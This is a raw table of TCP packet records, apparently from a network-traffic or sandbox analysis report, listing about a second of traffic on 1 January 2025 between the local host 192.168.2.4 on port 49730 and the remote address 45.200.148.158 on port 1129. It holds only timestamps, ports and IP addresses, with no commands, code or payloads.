Jan 1, 2025 18:10:02.665143967 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.667778969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667819977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667833090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667916059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667926073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667938948 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.667939901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.667968035 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.668004990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.668025970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.668037891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.668143034 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.674475908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674518108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674531937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674619913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.674660921 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674670935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674696922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674696922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.674710035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674875021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674889088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674896955 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.674904108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674920082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.674945116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.674945116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675136089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675174952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675184965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675199032 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675373077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675384045 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675401926 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675401926 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675412893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675429106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675430059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675447941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675785065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675796032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675812960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675822020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675836086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675836086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675848961 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675852060 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675868034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675872087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675878048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675898075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.675916910 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.675981045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676233053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676425934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676435947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676453114 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676465034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676475048 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676480055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676491976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676497936 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676502943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676515102 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676520109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676532030 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676543951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676544905 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676567078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676582098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.676582098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.676605940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677149057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677164078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677172899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677196026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677228928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677228928 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677428007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677438974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677459002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677469015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677483082 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677485943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677495956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677509069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677524090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677535057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677539110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677550077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677566051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677566051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677581072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677584887 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677592039 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677607059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677617073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677619934 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677637100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.677644014 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.677695990 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.678340912 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.678361893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.678371906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.681143999 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.690953970 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.690994978 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691003084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691087008 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.691113949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691126108 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691221952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.691288948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691298962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691304922 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.691368103 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.725337982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725393057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725404024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725418091 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.725503922 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.725565910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725579023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725589991 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725608110 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.725646973 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.725733995 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.727974892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728013992 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728024960 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728152037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728159904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.728163004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728180885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728190899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.728205919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.728219986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752166033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752191067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752199888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752217054 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752283096 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752291918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752311945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752357960 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752446890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752459049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752475977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752497911 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752578974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752629995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752640963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752713919 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752769947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752779961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.752962112 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.752989054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753000021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753015995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753026009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753036976 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.753043890 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753055096 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753070116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.753132105 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.753289938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753345013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753355980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753369093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.753417015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.753417015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.754548073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754618883 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754637957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754764080 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754775047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754789114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.754793882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754805088 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.754818916 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.754843950 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.761176109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761214972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761223078 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761240005 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.761312962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761338949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.761365891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761419058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.761445999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761461973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761471987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761567116 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.761899948 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761955023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.761965990 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762011051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762100935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762111902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762126923 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762187004 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762242079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762253046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762371063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762383938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762394905 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762412071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762422085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762435913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762439013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762463093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762670040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762681007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762792110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762836933 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762849092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762873888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762886047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762897015 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762902021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.762911081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.762964964 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763128996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763139963 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763156891 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763169050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763180017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763192892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763206959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763221025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763223886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763236046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763246059 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763297081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763654947 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763667107 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763684034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.763819933 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.763991117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764002085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764018059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764028072 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764040947 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764049053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764060974 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764071941 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764074087 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764084101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764091015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764101982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764115095 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764117956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764133930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764141083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764143944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764163971 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764187098 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764292002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764817953 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764830112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764847040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764857054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764872074 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764873981 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764883995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764897108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764899015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764919996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764930010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764941931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764945984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764954090 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.764961958 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764975071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.764985085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.765074968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.777724028 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.777781010 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.777791977 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.777906895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.777929068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.777951002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.777959108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.778094053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.778105021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.778120995 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.778146982 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.778172970 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.812118053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812151909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812160015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812222958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.812303066 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812314987 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812330961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812350035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.812355042 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.812369108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.812470913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.813143969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.814694881 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814754009 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814763069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814858913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814872980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814881086 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.814960003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.814981937 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.815007925 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.815028906 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.815051079 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.821172953 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.838886023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.838913918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.838923931 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839004993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839015007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839097023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839111090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839124918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839207888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839234114 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839286089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839297056 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839309931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839318037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839335918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839344025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 1, 2025 18:10:02.839622021 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839632034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 1, 2025 18:10:02.839647055 CET	49730	1129	192.168.2.4	45.200.148.158
